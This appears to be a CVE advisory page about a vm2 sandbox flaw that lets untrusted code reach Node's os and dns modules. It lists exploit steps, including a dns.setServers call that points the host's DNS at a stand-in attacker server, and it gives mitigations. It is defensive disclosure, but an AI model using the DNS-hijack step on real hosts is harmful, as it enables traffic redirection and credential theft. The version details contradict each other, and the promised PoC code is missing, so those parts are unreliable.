vm2, Process-Wide Builtin Exposure, CVE-2026-XXXXX (Critical) -DC-Aug2026-1527

Listen to this Post

The vm2 sandbox module for Node.js, when configured with `builtin: [”]` (the documented “full builtins” pattern), allows untrusted code to access the `os` and `dns` Node.js modules. These modules are not included in the `DANGEROUS_BUILTINS` list, which was updated in GHSA-9g8x-92q2-p28f to block other process-wide observability builtins like `diagnostics_channel` and perf_hooks. The issue arises because `builtin: [”]` expands to include all built-in Node.js modules except those explicitly blocked. The `vm.readonly()` proxy, intended to sandbox access, provides no protection for these modules as they expose host-process state and methods. Specifically, `os.userInfo()` reveals the host’s UID, GID, username, home directory, and shell. `os.networkInterfaces()` exposes the full network topology, including container and VM interfaces with their IP and MAC addresses. More critically, `os.setPriority()` and `dns.setServers()` allow mutation of host-process state. `dns.setServers()` is a powerful primitive that can replace the host’s DNS resolver list, effectively hijacking all subsequent DNS lookups performed by the host process, including outbound HTTP requests, telemetry, and npm registry calls. This allows an attacker to redirect traffic to malicious servers, exfiltrate credentials, or perform supply-chain attacks. The vulnerability is a chain of CWE-200 (Information Exposure), CWE-732 (Incorrect Permission Assignment), and CWE-285 (Improper Authorization). The CVSS v3.1 score is 9.3 (Critical) due to the high impact on confidentiality and integrity, and the fact that no privileges are required within the sandbox. The affected version is vm2 v3.11.5 and the upcoming 3.11.4 release. A proof of concept demonstrates how a sandboxed script can change the host process’s priority and replace its DNS servers, with effects persisting after the sandbox execution.

DailyCVE Form:

Platform: Node.js vm2
Version: v3.11.5
Vulnerability: Process-wide builtin exposure
Severity: Critical (9.3)
Date: 2026-08-17

Prediction: 2026-08-24

What Undercode Say:

Bash commands to verify the vulnerability using the provided Proof of Concept:

Clone vm2 repository and checkout a vulnerable commit
git clone https://github.com/patriksimek/vm2.git
cd vm2
git checkout 7a1f510
Run the POC script to demonstrate os and dns exposure
node test-poc.js

The `test-poc.js` script should contain the code from the to observe the `os` reads and `dns.setServers()` hijack.

Exploit:

  1. An attacker controls the code executed within a NodeVM instance configured with builtin: [''].
  2. The attacker’s code requires the `os` or `dns` module using `require(‘os’)` or require('dns').
  3. To read host information, the attacker calls os.userInfo(), os.networkInterfaces(), or os.hostname().
  4. To mutate host state, the attacker can execute `os.setPriority(10)` to change the host process’s priority.
  5. For the most severe impact, the attacker calls dns.setServers(['attacker-dns.example:53']), which replaces the host’s DNS resolver list, hijacking all future DNS queries from the host process.

Protection:

  • Apply the suggested fix by adding `’os’` and `’dns’` to the `DANGEROUS_BUILTINS` set in lib/builtin.js.
  • Avoid using the `”` wildcard for builtin; use explicit allowlists instead.
  • If `os` or `dns` functionality is required, register a safe mock or override via the `mock` or `override` options.
  • Users should wait for an official patch from the maintainers.

Impact:

  • Direct:
  • Host identity disclosure (os.userInfo()): Sandbox reads the host’s username, UID, GID, home directory, and shell. This can reveal the privilege level and target paths for further attacks.
  • Network topology disclosure (os.networkInterfaces()): Exposes internal network interfaces, aiding in network mapping and potential lateral movement.
  • Process-wide DNS hijack (dns.setServers()): Replaces the host’s DNS resolvers, allowing the attacker to redirect any outbound host connections, exfiltrate data, or perform supply-chain attacks.
  • Process priority mutation (os.setPriority()): Changes the host process priority, enabling denial-of-service or potential privilege escalation if CAP_SYS_NICE is available.
  • Indirect:
  • Composes with other granted network primitives (e.g., dgram, http, fetch) to create a more powerful attack vector.
  • Circumvents the protections introduced by GHSA-9g8x-92q2-p28f, as the same threat class was not fully addressed.
  • Defeats the purpose of the `vm.readonly()` proxy, which was intended to prevent such host-state exposure.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top